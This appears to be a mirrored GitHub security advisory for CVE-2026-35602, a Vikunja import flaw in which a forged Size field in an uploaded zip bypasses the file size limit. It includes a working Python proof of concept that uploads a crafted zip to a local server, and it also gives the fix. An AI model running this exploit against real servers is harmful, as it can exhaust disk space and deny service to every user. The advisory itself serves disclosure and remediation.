GHSA-QH78-RVG3-CV54
Vulnerability from github – Published: 2026-04-10 15:35 – Updated: 2026-04-10 19:46Summary
The Vikunja file import endpoint uses the attacker-controlled Size field from the JSON metadata inside the import zip instead of the actual decompressed file content length for the file size enforcement check. By setting Size to 0 in the JSON while including large compressed file entries in the zip, an attacker bypasses the configured maximum file size limit.
Details
During import, the JSON metadata from data.json inside the zip archive is deserialized into project structures. File content is read independently from the zip entries. When creating attachments, the code at pkg/modules/migration/create_from_structure.go:406 passes the attacker-controlled File.Size from the JSON:
err = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, a.File.Size, user)
The file size enforcement check at pkg/files/files.go:118 then evaluates this attacker-controlled value:
if realsize > config.GetMaxFileSizeInMBytes()*uint64(datasize.MB) && checkFileSizeLimit {
With Size set to 0 in the JSON, the comparison 0 > 20MB evaluates to false and the check passes. The actual file content (from the zip entry) can be up to 500MB per entry (the readZipEntry limit). Highly compressible content like zero-filled buffers achieves extreme compression ratios, allowing a small zip upload to store gigabytes of data.
Proof of Concept
Tested on Vikunja v2.2.2 with default max_file_size: 20MB.
import zipfile, io, json, requests
TARGET = "http://localhost:3456"
token = requests.post(f"{TARGET}/api/v1/login",
json={"username": "user1", "password": "User1pass!"}).json()["token"]
h = {"Authorization": f"Bearer {token}"}
# Craft zip with forged Size=0 in JSON but 25MB actual content
large_content = b"A" * (25 * 1024 * 1024) # 25MB
data = [{"title": "Project", "tasks": [{"title": "Task", "attachments": [{
"file": {"name": "large.bin", "size": 0, "created": "2026-01-01T00:00:00Z"},
"created": "2026-01-01T00:00:00Z"}]}]}]
zip_buf = io.BytesIO()
with zipfile.ZipFile(zip_buf, 'w', zipfile.ZIP_DEFLATED) as zf:
zf.writestr("VERSION", "2.2.2")
zf.writestr("data.json", json.dumps(data))
zf.writestr("large.bin", large_content)
resp = requests.put(f"{TARGET}/api/v1/migration/vikunja-file/migrate",
headers=h,
files={"import": ("export.zip", zip_buf.getvalue(), "application/zip")})
Output:
HTTP 200: {"message": "Everything was migrated successfully."}
25MB file stored despite 20MB server limit.
Impact
An authenticated user can exhaust server storage by uploading small compressed zip files that decompress into files exceeding the configured maximum file size limit. A single ~25KB upload can store ~25MB due to zip compression ratios. Repeated exploitation can fill the server's disk, causing denial of service for all users. No per-user storage quota exists to contain the impact.
Recommended Fix
Use the actual content length instead of the attacker-controlled Size field:
err = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, uint64(len(a.File.FileContent)), user)
Found and reported by aisafe.io
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.2.2"
},
"package": {
"ecosystem": "Go",
"name": "code.vikunja.io/api"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-35602"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-10T15:35:18Z",
"nvd_published_at": "2026-04-10T17:17:03Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nThe Vikunja file import endpoint uses the attacker-controlled `Size` field from the JSON metadata inside the import zip instead of the actual decompressed file content length for the file size enforcement check. By setting `Size` to 0 in the JSON while including large compressed file entries in the zip, an attacker bypasses the configured maximum file size limit.\n\n## Details\n\nDuring import, the JSON metadata from `data.json` inside the zip archive is deserialized into project structures. File content is read independently from the zip entries. When creating attachments, the code at `pkg/modules/migration/create_from_structure.go:406` passes the attacker-controlled `File.Size` from the JSON:\n\n```go\nerr = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, a.File.Size, user)\n```\n\nThe file size enforcement check at `pkg/files/files.go:118` then evaluates this attacker-controlled value:\n\n```go\nif realsize \u003e config.GetMaxFileSizeInMBytes()*uint64(datasize.MB) \u0026\u0026 checkFileSizeLimit {\n```\n\nWith `Size` set to 0 in the JSON, the comparison `0 \u003e 20MB` evaluates to false and the check passes. The actual file content (from the zip entry) can be up to 500MB per entry (the `readZipEntry` limit). Highly compressible content like zero-filled buffers achieves extreme compression ratios, allowing a small zip upload to store gigabytes of data.\n\n## Proof of Concept\n\nTested on Vikunja v2.2.2 with default `max_file_size: 20MB`.\n\n```python\nimport zipfile, io, json, requests\n\nTARGET = \"http://localhost:3456\"\ntoken = requests.post(f\"{TARGET}/api/v1/login\",\n json={\"username\": \"user1\", \"password\": \"User1pass!\"}).json()[\"token\"]\nh = {\"Authorization\": f\"Bearer {token}\"}\n\n# Craft zip with forged Size=0 in JSON but 25MB actual content\nlarge_content = b\"A\" * (25 * 1024 * 1024) # 25MB\ndata = [{\"title\": \"Project\", \"tasks\": [{\"title\": \"Task\", \"attachments\": [{\n \"file\": {\"name\": \"large.bin\", \"size\": 0, \"created\": \"2026-01-01T00:00:00Z\"},\n \"created\": \"2026-01-01T00:00:00Z\"}]}]}]\n\nzip_buf = io.BytesIO()\nwith zipfile.ZipFile(zip_buf, \u0027w\u0027, zipfile.ZIP_DEFLATED) as zf:\n zf.writestr(\"VERSION\", \"2.2.2\")\n zf.writestr(\"data.json\", json.dumps(data))\n zf.writestr(\"large.bin\", large_content)\n\nresp = requests.put(f\"{TARGET}/api/v1/migration/vikunja-file/migrate\",\n headers=h,\n files={\"import\": (\"export.zip\", zip_buf.getvalue(), \"application/zip\")})\n```\n\nOutput:\n```\nHTTP 200: {\"message\": \"Everything was migrated successfully.\"}\n25MB file stored despite 20MB server limit.\n```\n\n## Impact\n\nAn authenticated user can exhaust server storage by uploading small compressed zip files that decompress into files exceeding the configured maximum file size limit. A single ~25KB upload can store ~25MB due to zip compression ratios. Repeated exploitation can fill the server\u0027s disk, causing denial of service for all users. No per-user storage quota exists to contain the impact.\n\n## Recommended Fix\n\nUse the actual content length instead of the attacker-controlled `Size` field:\n\n```go\nerr = a.NewAttachment(s, bytes.NewReader(a.File.FileContent), a.File.Name, uint64(len(a.File.FileContent)), user)\n```\n\n---\n*Found and reported by [aisafe.io](https://aisafe.io)*",
"id": "GHSA-qh78-rvg3-cv54",
"modified": "2026-04-10T19:46:01Z",
"published": "2026-04-10T15:35:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-qh78-rvg3-cv54"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35602"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/pull/2575"
},
{
"type": "PACKAGE",
"url": "https://github.com/go-vikunja/vikunja"
},
{
"type": "WEB",
"url": "https://github.com/go-vikunja/vikunja/releases/tag/v2.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "Vikunja has File Size Limit Bypass via Vikunja Import"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.